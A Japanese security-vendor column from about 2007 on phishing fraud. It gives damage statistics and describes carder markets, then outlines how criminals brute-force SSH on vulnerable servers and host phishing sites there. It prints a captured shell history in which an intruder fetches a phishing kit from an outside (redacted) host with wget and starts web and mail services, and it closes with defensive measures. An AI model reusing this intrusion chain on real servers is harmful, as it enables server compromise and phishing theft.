今週のSecurity Check(第185回)

 個人情報やクレジットカード番号を狙うフィッシング詐欺が後を絶たない。2007年1月15日には,偽りのオークション・サイトを利用した詐欺が確認された(関連記事)。具体的な被害額や情報を売買する組織の存在についても報じられている。

 ブロードバンド推進協議会(BBA)の調査によれば,日本国内のフィッシング詐欺による被害額は約68億円(関連記事)。米ガートナーの調べによれば,海外では2006年の被害総額は28億ドル(約3360億円)以上に達する(関連記事)。このうち目立つのは,米ペイパルや米イーベイのように個人間決済を仲介するサービスや,クレジットカード会社をかたり,クレジットカード番号を狙った詐欺である。

 米国連邦捜査局(FBI)の現役捜査官が発表した情報によると,”CARDER”と呼ばれる闇組織が,クレジットカード情報の収集や売買・交換などを行っているという。このような組織が存在することで,情報の売買が容易に行えるようになったことがフィッシング詐欺を助長していると言える。

ぜい弱なサーバーを乗っ取りフィッシング・サイト構築

 フィッシング詐欺は無差別に電子メール(迷惑メール)を送信して,偽りのサイトへ誘い込む手口が代表的である。当然,犯罪者は被害者を誘い込むための偽サイト(フィッシング・サイト)を構築しなければならない。フィッシング・サイトを構築するためのツールが流通しており,Webアプリケーション開発の知識のない者であっても比較的手軽にフィッシング・サイトを構築できる状況にある。

 重要なのは,犯罪者は自前のサーバーを使わないことだ。必ずぜい弱なサーバーに侵入し,そこにフィッシング・サイトを作る。始まりはたいてい,ぜい弱なサーバーの“パスワード破り”なのである(攻撃の詳細については、“本当に怖い「パスワード破り」”を寄稿しているので、あわせて参考にしていただきたい)。


図1 フィッシング・サイト構築法の一例
[画像のクリックで拡大表示]

 当社(インターネット セキュリティ システムズ)のセキュリティ・オペレーション・センターでデータを収集し,解析した結果から,構築法の一例を紹介しよう(図1)。手順はこうだ。

  1. フィッシング・サイト構築に必要なデータを収集し,犯罪者のサーバーに置いておく
  2. SSHブルートフォース・アタックによってパスワード解析する
  3. SSHを利用してぜい弱なサイトに不正アクセスする
  4. 侵入したサーバーから犯罪者のサーバーに接続し,フィッシングに必要なファイルを転送する
  5. 偽サイトに必要なサービスを立ち上げる

 詳細な手順はhistoryコマンドの出力結果から確認できる(リスト1)。出力結果を見ると,wgetコマンドを使ってファイルをダウンロードし(リスト1の49行目),転送した圧縮ファイルを解凍している(同51行目)ことがわかる。次に,フィッシング・サイトでphpとSendmailを使用するため,バージョンを確認し(同53,54行目),必要なサービスを開始させる(同56から61行目)。

リスト1 historyコマンドの出力結果

  1. cd /var/www/html
  2. wget XXXX.XXXX.ro/a/ new.XXXX.com.zip
  3. ls -a
  4. unzip new.XXXX.com.zip
  5. rm -rf new.XXXX.com.zip
  6. rpm -q php
  7. rpm -q sendmail
  8. ls -a
  9. service httpd status
  10. service httpd start
  11. service httpd restart
  12. service httpd reload
  13. service sendmail restart
  14. service sendmail reload

 あとは,ボット・プログラムを忍び込ませた コンピュータを使って,被害者をフィッシング・サイトに誘導する迷惑メールを配信,フィッシング・サイトに入力された個人情報を犯罪者にメールで送信するだけである。

対応は進んでいるが不十分

 フィッシング詐欺に対して総務省と経済産業省は,2006年12月12日,「サイバークリーンセンター」を設置し,迷惑メールの送信を行うボットの駆除を開始した。これ以外にも,銀行で従来はATMに限定されていた“不正使用被害への補償”をネット・バンキングまで範囲を広げるなどの取り組みが行われている。また,国境を越えて行われる犯罪に対し、各国の捜査機関が連携して、捜査を行っている。日本でも国際捜査を円滑に行うため、刑事共助条約の締結に向けた動きが活発になっている。刑事共助条約とは、外交ルートを通じることなく条約の定める中央当局間で刑事事件の捜査、訴追等に必要な証拠を提供する等の連絡を直接行うことを規定する条約である。2007年1月20日に日本と大韓民国との間に条約が締結され、中国、ロシアの間でも条約締結に向けた交渉が開始された。

 こうした取り組みの成果も見え始めた。例えば2006年11月3日にはFBIによってフィッシング詐欺の容疑者17人が逮捕された(ソフォスによる発表内容)。12月にはスペインでフィッシング詐欺組織が逮捕された(http://www.viruslist.com/en/news?id=208274019)。捜査の過程で偽りの銀行カードや偽造パスポートが発見されている。ただ,それでも決して十分とは言えない。フィッシング・サイトそのものの構築を阻むべく,企業や官公庁,大学などのサーバー管理者が,パスワード破りの対策を徹底する必要がある。油断していると,思わぬところでフィッシング詐欺に加担することになりかねない。

  1. 複雑なパスワードを設定する。または、SSHであれば認証に公開鍵認証等を使用する
  2. 定期的にHistoryログ等の確認を行う
  3. 業務で必要のない内部から外部への電子メールやHTTPの通信を制限する

というのが基本的な対策だ。


守屋 英一
インターネットセキュリティシステムズ
マネージド セキュリティ サービス部
セキュリティ オペレーション センター スーパーバイザー
シニア セキュリティ エンジニア


 ITpro Securityが提供する「今週のSecurity Check」は,セキュリティに関する技術コラムです。セキュリティ・ベンダーである「インターネット セキュリティ システムズ株式会社」のスタッフの方々を執筆陣に迎え,同社のセキュリティ・オペレーション・センター(SOC)で観測した攻撃の傾向や,セキュリティ・コンサルタントが現場で得たエッセンスなどを織り交ぜながら,セキュリティに関する技術や最新動向などを分かりやすく解説していただきます。(編集部より)